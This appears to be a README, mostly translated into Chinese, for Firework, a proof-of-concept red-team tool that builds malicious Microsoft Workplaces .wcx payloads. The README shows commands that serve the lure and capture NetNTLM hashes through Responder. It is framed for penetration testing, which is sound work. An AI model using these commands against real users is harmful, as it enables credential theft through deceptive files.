
Firework is a proof of concept tool to interact with Microsoft Workplaces creating valid files required for the provisioning process.
⚠️ 注意:此工具已不再积极维护。
Firework 是一个概念验证工具,用于与 Microsoft Workplaces 交互,创建配置过程所需的有效文件。该工具还封装了 Responder 中的部分代码,以利用其从通过 Workplace 订阅进行配置的系统捕获 NetNTLM 哈希的能力。
此工具可用于渗透测试或红队演练,创建一个 .wcx 载荷(及关联的订阅源),如果被点击,则可用于:
阅读 SpiderLabs 博客以获得更详细的总结和演练。
$ pip install -r requirements.txt
.-:::::'::::::::::.. .,::::::.:: . .::: ... :::::::.. ::: .
;;;'''' ;;;;;;;``;;;; ;;;;''''';;, ;; ;;;'.;;;;;;;. ;;;;``;;;; ;;; .;;,.
[[[,,== [[[ [[[,/[[[' [[cccc '[[, [[, [[',[[ \[[,[[[,/[[[' [[[[[/'
`$$$"`` $$$ $$$$$$c $$"""" Y$c$$$c$P $$$, $$$$$$$$$c _$$$$,
888 888 888b "88bo,888oo,__ "88"888 "888,_ _,88P888b "88bo,"888"88o,
"MM, MMM MMMM "W" """"YUMMM "M "M" "YMMMMMP" MMMM "W" MMM "MMP"
usage: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN]
[-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH]
[-t CERT] [-k KEY]
WCX workplace tool
optional arguments:
-h, --help show this help message and exit
-c COMPANY, --company COMPANY
Company name
-u URL, --url URL Feed URL
-a APP, --app APP App Name
-e EXT, --ext EXT App Extension
-i ICON, --icon ICON App Icon
-l LISTEN, --listen LISTEN
TLS Web Server Port
-r RDP, --rdp RDP RDP Server
-d DOMAIN, --domain DOMAIN
RDP Domain
-n USERNAME, --username USERNAME
RDP Username
-p PASSWORD, --password PASSWORD
RDP Password
-t CERT, --cert CERT SSL cert
-k KEY, --key KEY SSL key
用法: firework.py [-h] -c COMPANY -u URL -a APP -e EXT -i ICON [-l LISTEN] [-r RDP] [-d DOMAIN] [-n USERNAME] [-p PASSWORDHASH] [-t CERT] [-k KEY]
WCX workplace 工具
可选参数: -h, --help 显示此帮助信息并退出 -c COMPANY, --company COMPANY 公司名称 -u URL, --url URL 订阅源 URL -a APP, --app APP 应用名称 -e EXT, --ext EXT 应用扩展名 -i ICON, --icon ICON 应用图标 -l LISTEN, --listen LISTEN TLS Web 服务器端口 -r RDP, --rdp RDP RDP 服务器 -d DOMAIN, --domain DOMAIN RDP 域名 -n USERNAME, --username USERNAME RDP 用户名 -p PASSWORD, --password PASSWORD RDP 密码 -t CERT, --cert CERT SSL 证书 -k KEY, --key KEY SSL 密钥
基本示例:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico
如果当前目录中存在 cert.crt 和 key.pem,则内置 Web 服务器将在端口 443 上启动。这将强制与 responder 进行 NTLM 挑战。如果这些文件不存在,则工具会将所有文件写入本地目录,供您自行托管。
如果您希望在其他端口上启动内置 Web 服务器,请使用 -l 标志,如下所示:
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -l 8443
您还可以对提供的 .rdp 文件添加一些自定义设置。
注意:默认配置下,存储在 .rdp 文件中的密码很可能被忽略。
python ./firework.py -c EvilCorp -u https://example.org/ -a Firework -e .fwk -i ./firework.ico -r dc.corp.local -d corp.local -n admin -p <crypt password>
运行工具后,'payload.wcx' 将被写入当前目录。这个文件被点击后会启动配置过程。
Firework
由 David Middlehurst 创建 版权所有 (C) 2018 Trustwave Holdings, Inc.
本程序是自由软件:您可以重新分发和/或修改它 依据自由软件基金会发布的 GNU 通用公共许可证条款, 许可证版本 3 或(根据您的选择)任何更高版本。
本程序分发时希望它会有用, 但没有任何担保;甚至没有适销性或特定用途的隐含担保。 详情请参阅 GNU 通用公共许可证。